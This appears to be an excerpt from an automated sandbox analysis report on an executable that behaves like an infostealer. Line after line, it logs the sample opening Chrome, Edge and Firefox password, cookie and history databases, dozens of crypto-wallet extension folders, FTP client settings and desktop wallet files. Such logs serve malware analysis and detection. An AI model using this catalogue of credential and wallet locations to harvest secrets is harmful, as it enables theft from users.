                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HQJBRDYKDEJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
